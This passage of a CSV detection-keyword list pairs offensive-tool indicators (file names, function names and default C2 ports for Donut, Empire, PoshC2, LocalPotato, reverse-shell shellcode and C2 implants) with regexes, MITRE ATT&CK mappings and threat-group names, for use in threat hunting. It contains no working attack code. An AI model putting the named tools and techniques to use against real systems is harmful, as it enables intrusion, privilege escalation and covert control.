TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*loader/inject.c*",".{0,1000}loader\/inject\.c.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*loader/inject_local.c*",".{0,1000}loader\/inject_local\.c.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*loader/loader/loader.c*",".{0,1000}loader\/loader\/loader\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","870","139","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z" "*loader_exe_x64.*",".{0,1000}loader_exe_x64\..{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*loader_exe_x86.*",".{0,1000}loader_exe_x86\..{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*Loader'z WEB shell*",".{0,1000}Loader\'z\sWEB\sshell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*LoadEWSDLL*",".{0,1000}LoadEWSDLL.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*loadKirbiFile*",".{0,1000}loadKirbiFile.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*loadliba_reverse_tcp.asm*",".{0,1000}loadliba_reverse_tcp\.asm.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*loadliba_shell.asm*",".{0,1000}loadliba_shell\.asm.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*loadliba_single_shell_reverse_tcp.asm*",".{0,1000}loadliba_single_shell_reverse_tcp\.asm.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*loadmodule *.ps1*",".{0,1000}loadmodule\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*loadmodume */modules/*.ps1**",".{0,1000}loadmodume\s.{0,1000}\/modules\/.{0,1000}\.ps1.{0,1000}.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Load-PSObfuscation*",".{0,1000}Load\-PSObfuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*Load-PyFuscation*",".{0,1000}Load\-PyFuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*Local:Get-DelegateType*",".{0,1000}Local\:Get\-DelegateType.{0,1000}","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Local:Get-PEArchitecture*",".{0,1000}Local\:Get\-PEArchitecture.{0,1000}","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Local:Get-ProcAddress*",".{0,1000}Local\:Get\-ProcAddress.{0,1000}","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*-local=0.0.0.0:4001*",".{0,1000}\-local\=0\.0\.0\.0\:4001.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*LocalAdminSharp.csproj*",".{0,1000}LocalAdminSharp\.csproj.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","10","2","150","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z" "*LocalAdminSharp.exe*",".{0,1000}LocalAdminSharp\.exe.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","10","2","150","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z" "*LocalAdminSharp-main*'",".{0,1000}LocalAdminSharp\-main.{0,1000}\'","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","0","N/A","10","2","150","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z" "*localexploit_demo_template.erb*",".{0,1000}localexploit_demo_template\.erb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*localhost/pipe/pwned*",".{0,1000}localhost\/pipe\/pwned.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*localhost:1337*",".{0,1000}localhost\:1337.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1475","287","2024-05-01T19:00:30Z","2022-09-07T02:47:43Z" "*localhost:1337*",".{0,1000}localhost\:1337.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*localhost:3000*striker*",".{0,1000}localhost\:3000.{0,1000}striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*localhost:31337*",".{0,1000}localhost\:31337.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*localhost:3333*",".{0,1000}localhost\:3333.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1475","287","2024-05-01T19:00:30Z","2022-09-07T02:47:43Z" "*localhost:4567*",".{0,1000}localhost\:4567.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","50","4","2024-04-12T15:25:40Z","2023-04-19T10:59:30Z" "*localhost:53531*",".{0,1000}localhost\:53531.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*localhost:8000/*/hardware*",".{0,1000}localhost\:8000\/.{0,1000}\/hardware.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*localhost:8000/*/netscan*",".{0,1000}localhost\:8000\/.{0,1000}\/netscan.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*localhost:8000/*/osinfo*",".{0,1000}localhost\:8000\/.{0,1000}\/osinfo.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*localhost:8000/*/speedtest*",".{0,1000}localhost\:8000\/.{0,1000}\/speedtest.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*localhost:8022*",".{0,1000}localhost\:8022.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*localhost:8848*",".{0,1000}localhost\:8848.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*LocalPotato (aka CVE-2023-21746 & HTTP/WebDAV)*",".{0,1000}LocalPotato\s\(aka\sCVE\-2023\-21746\s\&\sHTTP\/WebDAV\).{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*localpotato -i*",".{0,1000}localpotato\s\-i.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*LocalPotato.cpp*",".{0,1000}LocalPotato\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*LocalPotato.exe*",".{0,1000}LocalPotato\.exe.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*LocalPotato.html*",".{0,1000}LocalPotato\.html.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*LocalPotato.sln*",".{0,1000}LocalPotato\.sln.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*LocalPotato.vcxproj*",".{0,1000}LocalPotato\.vcxproj.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*LocalPotato.zip*",".{0,1000}LocalPotato\.zip.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*LocalPotato-master*",".{0,1000}LocalPotato\-master.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*localreconmodules*",".{0,1000}localreconmodules.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*localrelay_linux_amd64*",".{0,1000}localrelay_linux_amd64.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*localS4U2Proxy.tickets*",".{0,1000}localS4U2Proxy\.tickets.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*LocateBrc4Config*",".{0,1000}LocateBrc4Config.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*lockless *.dat*",".{0,1000}lockless\s.{0,1000}\.dat.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - 